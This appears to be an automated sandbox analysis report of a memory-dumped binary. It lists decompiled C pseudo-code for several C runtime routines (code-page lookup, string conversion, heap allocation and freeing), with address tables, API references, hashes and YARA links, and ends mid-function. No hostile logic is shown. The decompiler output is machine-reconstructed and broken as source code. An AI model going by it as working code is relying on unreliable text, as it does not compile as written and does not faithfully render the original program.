				_t109 = _a16;
				_v36 = _t109;
				if(_t112 <= 0) {
					if(_t112 < 0xffffffff) {
						goto L60;
					} else {
						goto L3;
					}
				} else {
					_t112 = E00E95EAD(_t109, _t112);
					_t59 = _v40;
					L3:
					_t87 = _a28;
					if(_t87 <= 0) {
						if(_t87 < 0xffffffff) {
							goto L60;
						} else {
							goto L6;
						}
					} else {
						_t87 = E00E95EAD(_t59, _t87);
						L6:
						_t62 = _a32;
						if(_t62 == 0) {
							_t62 =  *( *_v44 + 8);
							_a32 = _t62;
						}
						if(_t112 == 0 || _t87 == 0) {
							if(_t112 == _t87) {
								L59:
								_push(2);
								goto L22;
							} else {
								if(_t87 > 1) {
									L31:
								} else {
									if(_t112 > 1) {
										L21:
										_push(3);
										goto L22;
									} else {
										if(GetCPInfo(_t62,  &_v28) == 0) {
											goto L60;
										} else {
											if(_t112 <= 0) {
												if(_t87 <= 0) {
													goto L32;
												} else {
													if(_v28 >= 2) {
														_t80 =  &_v22;
														if(_v22 != 0) {
															_t115 = _v40;
															while(1) {
																_t98 =  *((intOrPtr*)(_t80 + 1));
																if(_t98 == 0) {
																	goto L31;
																}
																_t106 =  *_t115;
																if(_t106 <  *_t80 || _t106 > _t98) {
																	_t80 = _t80 + 2;
																	if( *_t80 != 0) {
																		continue;
																	} else {
																		goto L31;
																	}
																} else {
																	goto L59;
																}
																goto L61;
															}
														}
													}
													goto L31;
												}
											} else {
												if(_v28 >= 2) {
													_t81 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t99 =  *((intOrPtr*)(_t81 + 1));
															if(_t99 == 0) {
																goto L21;
															}
															_t107 =  *_t109;
															if(_t107 <  *_t81 || _t107 > _t99) {
																_t81 = _t81 + 2;
																if( *_t81 != 0) {
																	continue;
																} else {
																	goto L21;
																}
															} else {
																goto L59;
															}
															goto L22;
														}
													}
												}
												goto L21;
												L22:
											}
										}
									}
								}
							}
						} else {
							L32:
							_t110 = 0;
							_t67 = E00E9A8F9(_a32, 9, _v36, _t112, 0, 0);
							_t119 = _t117 + 0x18;
							_v44 = _t67;
							if(_t67 == 0) {
								L60:
							} else {
								asm("sbb eax, eax");
								_t68 = _t67 & _t67 + _t67 + 0x00000008;
								if(_t68 == 0) {
									_t69 = 0;
									_v32 = 0;
									goto L41;
								} else {
									if(_t68 > 0x400) {
										_t79 = E00E96F1C(_t68);
										_v32 = _t79;
										if(_t79 == 0) {
											goto L57;
										} else {
											 *_t79 = 0xdddd;
											goto L39;
										}
									} else {
										E00EA4C00();
										_t79 = _t119;
										_v32 = _t79;
										if(_t79 == 0) {
											L57:
											_t88 = _v32;
										} else {
											 *_t79 = 0xcccc;
											L39:
											_t69 = _t79 + 8;
											_v32 = _t69;
											L41:
											if(_t69 == 0) {
												goto L57;
											} else {
												_t113 = _a32;
												_t72 = E00E9A8F9(_a32, 1, _v36, _t112, _t69, _v44);
												_t120 = _t119 + 0x18;
												if(_t72 == 0) {
													goto L57;
												} else {
													_t73 = E00E9A8F9(_t113, 9, _v40, _t87, _t110, _t110);
													_t121 = _t120 + 0x18;
													_v36 = _t73;
													if(_t73 == 0) {
														goto L57;
													} else {
														asm("sbb eax, eax");
														_t74 = _t73 & _t73 + _t73 + 0x00000008;
														if(_t74 == 0) {
															_t114 = _t110;
															goto L52;
														} else {
															if(_t74 > 0x400) {
																_t114 = E00E96F1C(_t74);
																if(_t114 == 0) {
																	goto L55;
																} else {
																	 *_t114 = 0xdddd;
																	goto L50;
																}
															} else {
																E00EA4C00();
																_t114 = _t121;
																if(_t114 == 0) {
																	L55:
																	_t88 = _v32;
																} else {
																	 *_t114 = 0xcccc;
																	L50:
																	_t114 = _t114 + 8;
																	L52:
																	if(_t114 == 0 || E00E9A8F9(_a32, 1, _v40, _t87, _t114, _v36) == 0) {
																		goto L55;
																	} else {
																		_t88 = _v32;
																		_t110 = E00E9DA47(_v48, _a12, _v32, _v44, _t114, _v36, _t110, _t110, _t110);
																	}
																}
															}
														}
														E00E8C920(_t114);
													}
												}
											}
										}
									}
								}
								E00E8C920(_t88);
							}
						}
					}
				}
				L61:
				return E00E8AE43(_v8 ^ _t116);
			}

0x00ea2d0f
0x00ea2d16
0x00ea2d1e
0x00ea2d21
0x00ea2d27
0x00ea2d2a
0x00ea2d2d
0x00ea2d31
0x00ea2d34
0x00ea2d39
0x00ea2d4e
0x00000000
0x00000000
0x00000000
0x00000000
0x00ea2d3b
0x00ea2d43
0x00ea2d45
0x00ea2d54
0x00ea2d54
0x00ea2d59
0x00ea2d6b
0x00000000
0x00000000
0x00000000
0x00000000
0x00ea2d5b
0x00ea2d64
0x00ea2d71
0x00ea2d71
0x00ea2d76
0x00ea2d7d
0x00ea2d80
0x00ea2d80
0x00ea2d85
0x00ea2d91
0x00ea2f77
0x00ea2f77
0x00000000
0x00ea2d97
0x00ea2d9a
0x00ea2e23
0x00ea2da0
0x00ea2da3
0x00ea2de8
0x00ea2de8
0x00000000
0x00ea2da5
0x00ea2db2
0x00000000
0x00ea2db8
0x00ea2dba
0x00ea2df2
0x00000000
0x00ea2df4
0x00ea2df8
0x00ea2dfe
0x00ea2e01
0x00ea2e03
0x00ea2e06
0x00ea2e06
0x00ea2e0b
0x00000000
0x00000000
0x00ea2e0d
0x00ea2e11
0x00ea2e1b
0x00ea2e21
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00ea2e11
0x00ea2e06
0x00ea2e01
0x00000000
0x00ea2df8
0x00ea2dbc
0x00ea2dc0
0x00ea2dc6
0x00ea2dc9
0x00ea2dcb
0x00ea2dcb
0x00ea2dd0
0x00000000
0x00000000
0x00ea2dd2
0x00ea2dd6
0x00ea2de0
0x00ea2de6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00ea2dd6
0x00ea2dcb
0x00ea2dc9
0x00000000
0x00ea2dea
0x00ea2dea
0x00ea2dba
0x00ea2db2
0x00ea2da3
0x00ea2d9a
0x00ea2e2b
0x00ea2e2b
0x00ea2e2b
0x00ea2e38
0x00ea2e3d
0x00ea2e40
0x00ea2e45
0x00ea2f7e
0x00ea2e4b
0x00ea2e53
0x00ea2e55
0x00ea2e57
0x00ea2e9a
0x00ea2e9c
0x00000000
0x00ea2e59
0x00ea2e5e
0x00ea2e7b
0x00ea2e80
0x00ea2e86
0x00000000
0x00ea2e8c
0x00ea2e8c
0x00000000
0x00ea2e8c
0x00ea2e60
0x00ea2e60
0x00ea2e65
0x00ea2e67
0x00ea2e6c
0x00ea2f69
0x00ea2f69
0x00ea2e72
0x00ea2e72
0x00ea2e92
0x00ea2e92
0x00ea2e95
0x00ea2e9f
0x00ea2ea1
0x00000000
0x00ea2ea7
0x00ea2eaf
0x00ea2eb5
0x00ea2eba
0x00ea2ebf
0x00000000
0x00ea2ec5
0x00ea2ece
0x00ea2ed3
0x00ea2ed6
0x00ea2edb
0x00000000
0x00ea2ee1
0x00ea2ee9
0x00ea2eeb
0x00ea2eed
0x00ea2f21
0x00000000
0x00ea2eef
0x00ea2ef4
0x00ea2f0f
0x00ea2f14
0x00000000
0x00ea2f16
0x00ea2f16
0x00000000
0x00ea2f16
0x00ea2ef6
0x00ea2ef6
0x00ea2efb
0x00ea2eff
0x00ea2f5d
0x00ea2f5d
0x00ea2f01
0x00ea2f01
0x00ea2f1c
0x00ea2f1c
0x00ea2f23
0x00ea2f25
0x00000000
0x00ea2f40
0x00ea2f40
0x00ea2f59
0x00ea2f59
0x00ea2f25
0x00ea2eff
0x00ea2ef4
0x00ea2f61
0x00ea2f66
0x00ea2edb
0x00ea2ebf
0x00ea2ea1
0x00ea2e6c
0x00ea2e5e
0x00ea2f6d
0x00ea2f73
0x00ea2e45
0x00ea2d85
0x00ea2d59
0x00ea2f80
0x00ea2f93

APIs

GetCPInfo.KERNEL32(00000000,00000001,00000000,7FFFFFFF,?,?,00EA2FC5,00000000,00000000,00000002,00000001,?,?,?,?,00000001), ref: 00EA2DAA
__freea.LIBCMT ref: 00EA2F61
__freea.LIBCMT ref: 00EA2F6D

Strings

F8A/, xrefs: 00EA2D0F

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: __freea$Info
String ID: F8A/
API String ID: 541289543-73971870
Opcode ID: ef90deef00a5ca711661d64f9cd6757e4f8d2b47826b0a0e567f690442df29da
Instruction ID: dfe8c9e254200696053ae952ebb7974a8896fd5a9645b32ce37e365bbc335902
Opcode Fuzzy Hash: ef90deef00a5ca711661d64f9cd6757e4f8d2b47826b0a0e567f690442df29da
Instruction Fuzzy Hash: 8B818F72E00246AEDF219E688C41AEE7BF5EF4F354F19605DEA04BF251D725EC408BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E99149, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00E99149(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				signed int _t41;
				signed int _t49;
				void* _t52;
				signed int _t56;
				void* _t60;
				intOrPtr _t63;
				void* _t64;
				intOrPtr _t68;
				intOrPtr* _t71;
				intOrPtr _t85;
				intOrPtr* _t91;
				intOrPtr _t93;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0xea9014; // 0xa413846
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t68 = E00E95EAD(_a16, _t93);
					_t103 = _t68 - _t93;
					_t4 = _t68 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t68;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t85 = E00E9A8F9(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t85;
				if(_t85 == 0) {
					L39:
					return E00E8AE43(_v8 ^ _t96);
				} else {
					_t17 = _t85 + _t85 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t85 + _t85 & _t17;
					if(_t49 == 0) {
						_t71 = 0;
						L15:
						if(_t71 == 0) {
							L37:
							_t95 = 0;
							L38:
							E00E8C920(_t71);
							goto L39;
						}
						_t52 = E00E9A8F9(_t88, 1, _a16, _t93, _t71, _t85);
						_t100 = _t98 + 0x18;
						if(_t52 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t95 = E00E9DD36(_a8, _a12, _t71, _v12, 0, 0, 0, 0, 0);
						if(_t95 == 0) {
							goto L37;
						}
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t56 = _t95 + _t95 & _t31;
							if(_t56 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E00E9DD36(_a8, _a12, _t71, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E00E8C920(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t60 = E00E9A975();
									_t95 = _t60;
									if(_t60 != 0) {
										E00E8C920(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t56 > 0x400) {
								_t91 = E00E96F1C(_t56);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E00EA4C00();
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t64 = E00E9DD36(_a8, _a12, _t71, _t90, _a24, _t63, 0, 0, 0);
						_t95 = _t64;
						if(_t64 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t71 = E00E96F1C(_t49);
						if(_t71 == 0) {
							L13:
							_t85 = _v12;
							goto L15;
						}
						 *_t71 = 0xdddd;
						L12:
						_t71 = _t71 + 8;
						goto L13;
					}
					E00EA4C00();
					_t71 = _t98;
					if(_t71 == 0) {
						goto L13;
					}
					 *_t71 = 0xcccc;
					goto L12;
				}
			}

0x00e9914e
0x00e9914f
0x00e99150
0x00e99157
0x00e9915c
0x00e99162
0x00e99168
0x00e9916e
0x00e99171
0x00e99171
0x00e99174
0x00e99176
0x00e99176
0x00e99174
0x00e99178
0x00e9917d
0x00e99184
0x00e99187
0x00e99187
0x00e991a8
0x00e991aa
0x00e991ad
0x00e991b2
0x00e99310
0x00e99323
0x00e991b8
0x00e991bb
0x00e991c0
0x00e991c2
0x00e991c4
0x00e991fb
0x00e991fd
0x00e991ff
0x00e99305
0x00e99305
0x00e99307
0x00e99308
0x00000000
0x00e9930e
0x00e9920e
0x00e99213
0x00e99218
0x00000000
0x00000000
0x00e9921e
0x00e99235
0x00e99239
0x00000000
0x00000000
0x00e99247
0x00e99284
0x00e99289
0x00e9928b
0x00e9928d
0x00e992be
0x00e992c0
0x00e992c2
0x00e992fe
0x00e992ff
0x00000000
0x00e992df
0x00e992e1
0x00e992e2
0x00e992e6
0x00e99324
0x00e99327
0x00e992e8
0x00e992e8
0x00e992e9
0x00e992e9
0x00e992ea
0x00e992eb
0x00e992ec
0x00e992ed
0x00e992f0
0x00e992f5
0x00e992fc
0x00e9932d
0x00000000
0x00000000
0x00000000
0x00000000
0x00e992fc
0x00e992c2
0x00e99291
0x00e992ac
0x00e992b1
0x00000000
0x00000000
0x00e992b3
0x00e992b9
0x00e992b9
0x00000000
0x00e992b9
0x00e99293
0x00e99298
0x00e9929c
0x00000000
0x00000000
0x00e9929e
0x00000000
0x00e9929e
0x00e99249
0x00e9924e
0x00000000
0x00000000
0x00e99256
0x00000000
0x00000000
0x00e9926d
0x00e99272
0x00e99276
0x00000000
0x00000000
0x00000000
0x00e9927c
0x00e991cb
0x00e991e6
0x00e991eb
0x00e991f6
0x00e991f6
0x00000000
0x00e991f6
0x00e991ed
0x00e991f3
0x00e991f3
0x00000000
0x00e991f3
0x00e991cd
0x00e991d2
0x00e991d6
0x00000000
0x00000000
0x00e991d8
0x00000000
0x00e991d8

APIs

__freea.LIBCMT ref: 00E992FF

Part of subcall function 00E96F1C: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,00E9084B,00000002,?,?,?,00E824A9,00000000,0000002C,00E825BB), ref: 00E96F4E

__freea.LIBCMT ref: 00E99308
__freea.LIBCMT ref: 00E9932D

Strings

F8A/, xrefs: 00E99150

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: __freea$AllocateHeap
String ID: F8A/
API String ID: 2243444508-73971870
Opcode ID: 57b21985f22b63bfa7ab609e8847dcfbb4ffdd78e39f2599e6a362fb95f1891d
Instruction ID: b01bcd06fa5ce7cb800f7e916abedbfc2924b2da556d3e064b488e61177f2b40
Opcode Fuzzy Hash: 57b21985f22b63bfa7ab609e8847dcfbb4ffdd78e39f2599e6a362fb95f1891d
Instruction Fuzzy Hash: 6051E37250020ABFEF219F69DC85EBB36A9EF85754F26116DFC08BB152E730DC4086A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E9EDC5, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00E9EDC5(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12, signed int _a16, signed int* _a20) {
				signed int _v8;
				char _v136;
				void* _v140;
				signed int _v144;
				intOrPtr _v148;
				signed char _v176;
				signed int _t39;
				signed int _t41;
				signed int _t52;
				signed int _t53;
				signed int _t55;
				signed char _t62;
				signed int _t65;
				void* _t66;
				signed int* _t70;
				signed int _t82;
				signed int _t87;
				signed int _t88;

				_t39 =  *0xea9014; // 0xa413846
				_v8 = _t39 ^ _t88;
				_t41 = _a8;
				_t72 = _a4;
				_push(__ebx);
				_t70 = _a20;
				_push(__esi);
				_t85 = _a12;
				_push(__edi);
				_t82 = 0;
				_v148 = _a4;
				_v140 = _a12;
				 *_t70 = 0;
				_t96 = _t41 - 1;
				if(_t41 != 1) {
					__eflags = _t41 - 2;
					if(_t41 != 2) {
						__eflags = _t41;
						if(_t41 != 0) {
							goto L20;
						} else {
							_v140 = 0;
							_t41 = E00E9DBF9(_t85, _a16 | 0x20000000,  &_v140, 2);
							__eflags = _t41;
							if(_t41 == 0) {
								goto L20;
							} else {
								 *_t70 = _v140;
								goto L4;
							}
						}
					} else {
						_t41 = E00E9DBF9(_t85, _a16, 0, 0);
						_v144 = _t41;
						__eflags = _t41;
						if(_t41 == 0) {
							goto L20;
						} else {
							_t87 = E00E998AF(_t41, 2);
							__eflags = _t87;
							if(_t87 == 0) {
								goto L11;
							} else {
								_t52 = E00E9DBF9(_v140, _a16, _t87, _v144);
								goto L9;
							}
							goto L33;
						}
					}
					goto L21;
				} else {
					_t55 = E00E9ECE4(_t70, 0, _t85, _t96, _t72, _t85, _a16,  &_v136, 0x80);
					_v144 = _t55;
					if(_t55 == 0) {
						_t41 = GetLastError();
						__eflags = _t41 - 0x7a;
						if(__eflags != 0) {
							goto L20;
						} else {
							_t41 = E00E9ECE4(_t70, 0, _t85, __eflags, _v148, _t85, _a16, 0, 0);
							_v144 = _t41;
							__eflags = _t41;
							if(_t41 == 0) {
								goto L20;
							} else {
								_t87 = E00E998AF(_t41, 1);
								__eflags = _t87;
								if(__eflags == 0) {
									L11:
									__eflags = _t82;
								} else {
									_t52 = E00E9ECE4(_t70, 0, _t87, __eflags, _v148, _v140, _a16, _t87, _v144);
									L9:
									__eflags = _t52;
									if(_t52 == 0) {
										goto L11;
									} else {
										_t53 = _t87;
										_t87 = _t82;
										 *_t70 = _t53;
									}
								}
								E00E964B8(_t87);
							}
						}
						goto L21;
					} else {
						 *_t70 = E00E998AF(_t55, 1);
						_t41 = E00E964B8(0);
						if( *_t70 == 0) {
							L20:
							__eflags = _t41 | 0xffffffff;
							goto L21;
						} else {
							_push(_v144 - 1);
							if(E00EA3587( *_t70, _v144,  &_v136) != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E00E92919();
								asm("int3");
								_push(_t88);
								_t62 = _v176;
								__eflags = _t62 & 0x00000020;
								if((_t62 & 0x00000020) == 0) {
									__eflags = _t62 & 0x00000008;
									if((_t62 & 0x00000008) == 0) {
										__eflags = _t62 & 0x00000004;
										if((_t62 & 0x00000004) == 0) {
											__eflags = _t62 & 0x00000001;
											if((_t62 & 0x00000001) == 0) {
												_t65 = (_t62 & 2) + (_t62 & 2);
												__eflags = _t65;
												return _t65;
											} else {
												_push(3);
												goto L31;
											}
										} else {
											_push(2);
											goto L31;
										}
									} else {
										__eflags = 1;
										return 1;
									}
								} else {
									_push(5);
									L31:
									_pop(_t66);
									return _t66;
								}
							} else {
								L4:
								L21:
								return E00E8AE43(_v8 ^ _t88);
							}
						}
					}
				}
				L33:
			}

0x00e9edd0
0x00e9edd7
0x00e9edda
0x00e9eddd
0x00e9ede0
0x00e9ede1
0x00e9ede4
0x00e9ede5
0x00e9ede8
0x00e9ede9
0x00e9edeb
0x00e9edf1
0x00e9edf7
0x00e9edf9
0x00e9edfc
0x00e9eee4
0x00e9eee7
0x00e9ef25
0x00e9ef27
0x00000000
0x00e9ef29
0x00e9ef31
0x00e9ef42
0x00e9ef47
0x00e9ef49
0x00000000
0x00e9ef4b
0x00e9ef51
0x00000000
0x00e9ef51
0x00e9ef49
0x00e9eee9
0x00e9eeef
0x00e9eef4
0x00e9eefa
0x00e9eefc
0x00000000
0x00e9eefe
0x00e9ef06
0x00e9ef0a
0x00e9ef0c
0x00000000
0x00e9ef0e
0x00e9ef1e
0x00000000
0x00e9ef1e
0x00000000
0x00e9ef0c
0x00e9eefc
0x00000000
0x00e9ee02
0x00e9ee13
0x00e9ee1b
0x00e9ee23
0x00e9ee6b
0x00e9ee71
0x00e9ee74
0x00000000
0x00e9ee7a
0x00e9ee86
0x00e9ee8e
0x00e9ee94
0x00e9ee96
0x00000000
0x00e9ee9c
0x00e9eea4
0x00e9eea8
0x00e9eeaa
0x00e9eed6
0x00e9eed6
0x00e9eeac
0x00e9eec2
0x00e9eeca
0x00e9eeca
0x00e9eecc
0x00000000
0x00e9eece
0x00e9eece
0x00e9eed0
0x00e9eed2
0x00e9eed2
0x00e9eecc
0x00e9eeda
0x00e9eee0
0x00e9ee96
0x00000000
0x00e9ee25
0x00e9ee2e
0x00e9ee30
0x00e9ee3a
0x00e9ef58
0x00e9ef58
0x00000000
0x00e9ee40
0x00e9ee49
0x00e9ee5e
0x00e9ef6c
0x00e9ef6d
0x00e9ef6e
0x00e9ef6f
0x00e9ef70
0x00e9ef71
0x00e9ef76
0x00e9ef79
0x00e9ef7c
0x00e9ef7f
0x00e9ef81
0x00e9ef87
0x00e9ef89
0x00e9ef90
0x00e9ef92
0x00e9ef98
0x00e9ef9a
0x00e9efa7
0x00e9efa7
0x00e9efaa
0x00e9ef9c
0x00e9ef9c
0x00000000
0x00e9ef9c
0x00e9ef94
0x00e9ef94
0x00000000
0x00e9ef94
0x00e9ef8b
0x00e9ef8d
0x00e9ef8f
0x00e9ef8f
0x00e9ef83
0x00e9ef83
0x00e9ef9e
0x00e9ef9e
0x00e9efa0
0x00e9efa0
0x00e9ee64
0x00e9ee64
0x00e9ef5b
0x00e9ef6b
0x00e9ef6b
0x00e9ee5e
0x00e9ee3a
0x00e9ee23
0x00000000

APIs

_free.LIBCMT ref: 00E9EEDA

Part of subcall function 00E9ECE4: __freea.LIBCMT ref: 00E9ED99

_free.LIBCMT ref: 00E9EE30

Part of subcall function 00E964B8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E9B9CA,?,00000000,?,00000002,?,00E9BC6F,?,00000007,?,?,00E9C2E4,?), ref: 00E964CE
Part of subcall function 00E964B8: GetLastError.KERNEL32(?,?,00E9B9CA,?,00000000,?,00000002,?,00E9BC6F,?,00000007,?,?,00E9C2E4,?,?), ref: 00E964E0

GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00E9EE6B

Part of subcall function 00E998AF: RtlAllocateHeap.NTDLL(00000008,00E825BB,00000000,?,00E984AF,00000001,00000364,00000007,000000FF,?,00000000,00000002,00E95BC2,00E96F5F,00000000), ref: 00E998F0

Strings

F8A/, xrefs: 00E9EDD0

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHeapLast_free$AllocateFree__freea
String ID: F8A/
API String ID: 2880554715-73971870
Opcode ID: b6abcd2a276a2dd02453e47d931ca66a649af38ca91e9fc0376e31057fa470fb
Instruction ID: afcae4e1ad88d8345e04518b85b4df7f9c25628dcd67cc93c922817f46b6cc87
Opcode Fuzzy Hash: b6abcd2a276a2dd02453e47d931ca66a649af38ca91e9fc0376e31057fa470fb
Instruction Fuzzy Hash: 9D418271904259ABDF31DE698C41BAF7BB9BF55310F1050AAFA08F6241EE318D449B61

Uniqueness

Uniqueness Score: -1.00%

Function 00E953EA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00E953EA(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				signed int _v16;
				char _v20;
				signed int _v44;
				char _v80;
				char _v84;
				void* _v93;
				char _v100;
				char _v104;
				char* _v108;
				char _v112;
				void* __ebp;
				intOrPtr* _t72;
				signed int _t73;
				char _t74;
				void* _t77;
				signed int _t82;
				char _t86;
				signed int _t89;
				signed int _t97;
				signed int _t108;
				signed int _t112;
				char _t118;
				signed int _t127;
				signed int _t128;
				void* _t131;
				signed int _t133;
				signed int _t135;
				signed int _t145;
				void* _t155;
				intOrPtr* _t158;
				intOrPtr _t160;
				void* _t161;
				intOrPtr* _t164;
				signed int _t166;
				void* _t169;
				void* _t171;
				void* _t172;
				void* _t173;

				_t164 = __ecx;
				_push( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)))));
				_t72 =  *__ecx;
				_push( *_t72);
				L22();
				_t158 = _t72;
				_pop(_t131);
				if(_t158 == 0) {
					L4:
					_t73 = 0;
					goto L5;
				} else {
					_t74 = E00E9830D(_t131, _t155);
					_v12 = _t74;
					_t127 = 0;
					_v20 =  *((intOrPtr*)(_t74 + 0x4c));
					_t133 =  *(_t74 + 0x48);
					_t6 =  &_v20; // 0xe95623
					_v16 = _t133;
					_v8 = 0;
					_t77 = E00E9EC17(_t133,  &_v8, 0, 0, _t158, 0, _t6);
					_t172 = _t171 + 0x18;
					if(_t77 == 0) {
						_t128 = E00E96F1C(_v8 + 4);
						__eflags = _t128;
						if(_t128 == 0) {
							goto L4;
						} else {
							_t11 =  &_v20; // 0xe95623
							_t133 = _t11;
							_t13 = _t128 + 4; // 0x4
							_t82 = E00E9EC17(_t133, 0, _t13, _v8, _t158, 0xffffffff, _t133);
							_t172 = _t172 + 0x18;
							__eflags = _t82;
							if(_t82 == 0) {
								_t135 = _t133 | 0xffffffff;
								_t14 =  &_v20; // 0xe95623
								_t160 =  *_t14;
								__eflags =  *(_t160 + 0x24 + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8);
								if(__eflags != 0) {
									asm("lock xadd [edx], eax");
									if(__eflags == 0) {
										E00E964B8( *(_t160 + 0x24 + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8));
										_pop(_t145);
										 *(_t160 + 0x24 + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8) =  *(_t160 + 0x24 + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8) & 0x00000000;
										_t135 = _t145 | 0xffffffff;
										__eflags = _t135;
									}
								}
								_t86 = _v12;
								__eflags =  *(_t86 + 0x350) & 0x00000002;
								if(( *(_t86 + 0x350) & 0x00000002) == 0) {
									__eflags =  *0xea9900 & 0x00000001;
									if(( *0xea9900 & 0x00000001) == 0) {
										_t89 =  *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164));
										__eflags =  *(_t160 + 0x24 + _t89 * 8);
										if( *(_t160 + 0x24 + _t89 * 8) != 0) {
											asm("lock xadd [eax], ecx");
											__eflags = _t135 == 1;
											if(_t135 == 1) {
												E00E964B8( *(_t160 + 0x24 + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8));
												_t97 =  *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164));
												_t39 = _t160 + 0x24 + _t97 * 8;
												 *_t39 =  *(_t160 + 0x24 + _t97 * 8) & 0x00000000;
												__eflags =  *_t39;
											}
										}
									}
								}
								_t46 = _t128 + 4; // 0x4
								_t73 = _t46;
								 *_t128 =  *((intOrPtr*)(_t160 + 0xc));
								 *(_t160 + 0x24 + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8) = _t128;
								 *((intOrPtr*)(_t160 + 0x1c + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8)) = _t73;
								L5:
								return _t73;
							} else {
								__eflags = _t82 - 0x16;
								if(_t82 == 0x16) {
									L20:
									_t127 = 0;
									__eflags = 0;
									goto L21;
								} else {
									__eflags = _t82 - 0x22;
									if(_t82 == 0x22) {
										goto L20;
									} else {
										E00E964B8(_t128);
										goto L4;
									}
								}
							}
						}
					} else {
						if(_t77 == 0x16 || _t77 == 0x22) {
							L21:
							_push(_t127);
							_push(_t127);
							_push(_t127);
							_push(_t127);
							_push(_t127);
							E00E92919();
							asm("int3");
							_t169 = _t172;
							_push(_t133);
							__eflags = _v44;
							if(_v44 == 0) {
								return E00E94222(_v0, 0);
							}
							_push(_t164);
							_push(_t158);
							_t161 = 0;
							_t108 = E00E9E94E( &_v12, 0, 0, _a4, 0x7fffffff);
							_t173 = _t172 + 0x14;
							__eflags = _t108;
							if(_t108 == 0) {
								L27:
								_t166 = E00E998AF(_v12, 2);
								__eflags = _t166;
